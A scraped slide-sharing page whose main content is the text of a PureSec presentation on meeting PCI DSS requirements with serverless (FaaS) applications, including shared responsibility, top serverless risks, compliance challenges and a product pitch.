みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
Adtran
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
IndexBug
 

Recently uploaded (20)

Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 

PCI & Serverless - Everything you need to know

  • 1. PCICompliance& Serverless: EverythingYouNeed To Know Ory Segal (CTO), Ron Harnik (Head of Marketing)
  • 2. Agenda  Serverless in a nutshell  The Shared Model of Responsibility  Serverless AppSec: The Times They Are a-Changin’  PCI DSS Applicability to Serverless  PCI DSS / Serverless: Challenges
  • 4. Compute as a Utility
  • 5. Serverless Benefits No servers to manage Continuousscaling Sub-second metering Less security responsibilities
  • 6. EVENT TRIGGER DEPLOY EVENT SOURCES … INTERACTIONS REST API CLOUD RESOURCES CODE CODE REPOSITORY EVENT SOURCES CLOUD RESOURCES OUTPUT SERVERLESS (OVER) SIMPLIFIED FUNCTION {;}
  • 7. Shared Model Of Responsibility CLOUDPROVIDER RESPONSIBLE FOR SECURITY “OF” THE CLOUD REGIONS AVAILABILITY ZONES EDGE LOCATIONS COMPUTE STORAGE DATABASE NETWORK OPERATING SYSTEM + VIRTUAL MACHINES+ CONTAINERS APPLICATIONOWNER RESPONSIBLE FOR SECURITY “IN” THECLOUD APPLICATIONS(FUNCTIONS) IDENTITY & ACCESS MANAGEMENT CLOUD SERVICES CONFIGURATION CLIENT-SIDE DATA INCLOUD DATA INTRANSIT
  • 8. Security Responsibility: WhenYou Own The Infrastructure(IaaS)  Physicalinfrastructure,access restrictionstophysicalperimeterandhardware  Secureconfigurationofinfrastructuredevicesandsystems  Regularlytestingthesecurityofallsystems/processes(OS, services)  Identificationandauthenticationofaccess tosystems(OS,services)  PatchingandfixingflawsinOS  HardeningOS andservices  Protectingallsystemsagainstmalwareandbackdoors  Patchingandfixingflawsinruntimeenvironmentandrelatedsoftwarepackages  Exploitpreventionandmemoryprotection  Networksegmentation  Trackingandmonitoringallnetworkresourcesandaccess  Installationandmaintenanceofnetworkfirewalls  Network-layerDoSprotection  Authenticationofusers  Authorizationcontrolswhenaccessing applicationanddata  Log andmaintainaudittrailsofallaccess toapplicationanddata  Deployanapplicationlayerfirewallforevent-datainspection  Detectandfixvulnerabilitiesinthird-partydependencies  Useleast-privilegedIAMrolesandpermissions  Enforcelegitimateapplicationbehavior  Data leakprevention  Scan codeandconfigurationsstaticallyduringdevelopment  Maintainserverless/cloudassetinventory  Removeobsolete/unusedcloudservicesandfunctions  Continuouslymonitorerrorsandsecurityincidents 8% 92% APPLICATIONOWNER CLOUD PROVIDER http://bit.ly/faas-vs-iaas
  • 9. Security Responsibility: WhenYou Adopt Serverless  Physicalinfrastructure,access restrictionstophysicalperimeterandhardware  Secureconfigurationofinfrastructuredevicesandsystems  Regularlytestingthesecurityofallsystems/processes(OS, services)  Identificationandauthenticationofaccess tosystems(OS,services)  PatchingandfixingflawsinOS  HardeningOS andservices  Protectingallsystemsagainstmalwareandbackdoors  Patchingandfixingflawsinruntimeenvironmentandrelatedsoftwarepackages  Exploitpreventionandmemoryprotection  Networksegmentation  Trackingandmonitoringallnetworkresourcesandaccess  Installationandmaintenanceofnetworkfirewalls  Network-layerDoSprotection  Authenticationofusers  Authorizationcontrolswhenaccessing applicationanddata  Log andmaintainaudittrailsofallaccess toapplicationanddata  Deployanapplicationlayerfirewallforevent-datainspection  Detectandfixvulnerabilitiesinthird-partydependencies  Useleast-privilegedIAMrolesandpermissions  Enforcelegitimateapplicationbehavior  Data leakprevention  Scan codeandconfigurationsstaticallyduringdevelopment  Maintainserverless/cloudassetinventory  Removeobsolete/unusedcloudservicesandfunctions  Continuouslymonitorerrorsandsecurityincidents 52% 48% APPLICATIONOWNER CLOUD PROVIDER
  • 10. TopRisks for Serverless Applications http://bit.ly/csa-top-12 SAS-1 Function event-data injection Broken authentication SAS-2 Insecure serverless deployment SAS-3 Over-privileged function permissions SAS-4 Inadequate function monitoring SAS-5 Insecure 3rd partydependencies SAS-6 Insecure app secrets storage SAS-7 DoS&Financial exhaustion SAS-8 Serverless business logic manipulation SAS-9 Improper exceptions handling &errors SAS-10 Legacy functions & cloud resources SAS-11 Cross-execution data persistency SAS-12
  • 11. The Need For Serverless-Native Protection Protects applications by being deployed on networks and servers TRADITIONALSECURITY Theapplication owner doesn't have any control over the infrastructure SERVERLESS
  • 14. PCI DSS Applicabilityto FaaS/ Serverless  PCI DSS requirements & assessment procedures are stillvery much relevant to applications built on public-cloud FaaS  Public-cloud FaaS surfaces certain technicalchallenges related to the ability of organizations to comply using existingapproaches  “PCI SSC Cloud Computing Guidelines” sheds light on the challengesand technicallimitations of existing solutions, however doesn’t explicitlydiscuss FaaS (Only IaaS, PaaS, SaaS)
  • 15. Serverless & PCI: Where to Start? https://www.pcisecuritystandards.org/pdfs/PCI_SSC_Cloud_Guidelines_v3.pdf “Use of a PCIDSS compliant Provider does not automatically result in PCIDSS compliance for theCustomers” ⚠️ “Even where a cloud service is validated for certain PCI DSSrequirements, this validation does not automatically transfer to the Customer environments within that cloud service” ⚠️ This guidance is intended for organizations using, or thinkingof using, providing or assessing cloud technologies. It provides guidance on the useof cloud technologies and considerations for maintainingsecurity controls incloud environments
  • 17. Challenge #1: Network Access vs. API Access  In FaaS, the network is abstracted and is nolonger relevantto customers  Network traffic is replaced byapplication layer APIs + cloudAPIs  Access is controlled by IAM permissions  Inbound traffic, is mostly replacedby cloud eventsource triggers  Outbound traffic from theserverless runtime still possible “AswebservicesandAPIsarebynaturepubliclyaccessible, theirsecurityiscriticalto thesecurityoftheresourcesto whichtheyprovideaccess. Ifnot properlydeveloped, managedandsecured, theseinterfacescanbeexploited orcompromised, resultinginunexpectedbehavior andpotentially unauthorizedaccess” (PCISSCCloudComputingGuidelines) Since Firewalls/routers cannot bedeployed by customers of public-cloud FaaS, there aretechnical challenges for requirements: 1.2.1(Restrict inboundandoutboundtraffic…) , 1.3.4(Donotallowunauthorizedoutboundtraffic)
  • 19. Challenge #2: User Access Goes Beyond HTTP/Web  Serverless provides a rich set of cloud-native event inputs (dozens). Webtraffic is not the most common event source  Files are less relevant as a malware vector, otherinputs may still behave as malware  WAFs provide incomplete security protection  SAST solutions are ineffective (logic spans over functions, events and cloud services). Also doesn’t scan Infrastructure-as-code and IAM permissions  Already-deployed functions also require scanning for vulnerabilities (SCA)  DAST is ineffective for non-web events Technicalchallengesfor requirements: 5(Protect allsystems against malware), 5.1,6(Develop andmaintainsecuresystems &applications), 6.2 (Ensurethatallsystem componentsandsoftware areprotected fromknownvulnerabilities), 6.6(Manualorautomatedapplication vulnerability securityassessment tools, automatedtechnicalsolution thatdetects andprevents web-based attacks -forexample,a WAF)
  • 20. FUNCTION {;} Direct Invoke (24%) Queues & Streams (21%) API Gateway (14%) File Storage (13%) Notifications (13%) Logs (12%) Database (4%) … … … 37 other sources WAF SERVERLESS APPLICATION INPUTS (EVENTS) Estimation based on https://www.slideshare.net/ChrisMunns/serverless-is- dead-132954772
  • 21. Back to the Drawing Board
  • 22. FaaSapplicationsrequire a different securityapproach  The approach must be Serverless-centric, and should include the following:  Serverless oriented security testing:  Abilitytoscan Infrastructure-as-code& IAM roles, permissions,cloudservice config.  Abilitytodetect knownvulnerabilitiesin OSSpackagesofdeployedfunctions  Serverless-native application firewall:  Capableofdetecting & preventing attacksvia all cloud-nativeevent sourcetriggers  Canscale andprovideappsecurityforconcurrentexecutionsacrossregions  Serverless dedicated behavioral protection:  Capableofpreventing unwantedbehaviorandmalicious processes  Canenforcestrictaccesspermissions toprevent unauthorizedcloudAPI access  Canblockoutboundtrafficanddataleakage tothe Internetorothercloud accounts
  • 23. Puresec SSP: SERVERLESS POSTURE MANAGEMENT RUNTIME PROTECTION SECURITY VISIBILITY SERVERLESS ASSET INVENTORY VULNERABILITY MANAGEMENT DETECT IAM & CONFIGURATION ISSUES CI / CD INTEGRATION SERVERLESS APPLICATION FIREWALL BEHAVIORAL PROTECTION W/ ML BLAZING FAST PAINLESS DEPLOYMENT REAL TIME APP SECURITY VISIBLITY DEEP FORENSIC ANALYSIS SIEM INTEGRATIONS © 2019 PURESEC
  • 24. How Can PureSec Fill YourPCI DSS Gaps? Requirement Challenge Solution REQUIREMENT 1 • Cannot deploy firewalls & routers • Inbound traffic is now event triggers • Cannot prevent outbound traffic • Least privileged IAM permissions (who can invoke?) – via automated static scanning • Block unauthorized outbound traffic through Behavioral protection REQUIREMENT 5 • Cannot deploy anti-malware and endpoint prevention • Enforce known good behavior and prevent malicious actions through Behavioral protection • Block attempts to inject code through Serverless App Firewall REQUIREMENT 6 • SAST alone is ineffective • SAST doesn’t cover deployed assets • DAST is ineffective • WAF provides extremely partial coverage • Automated scanning of Serverless code, configuration, IAM, and OSS • Full coverage over all event source types with Serverless App Firewall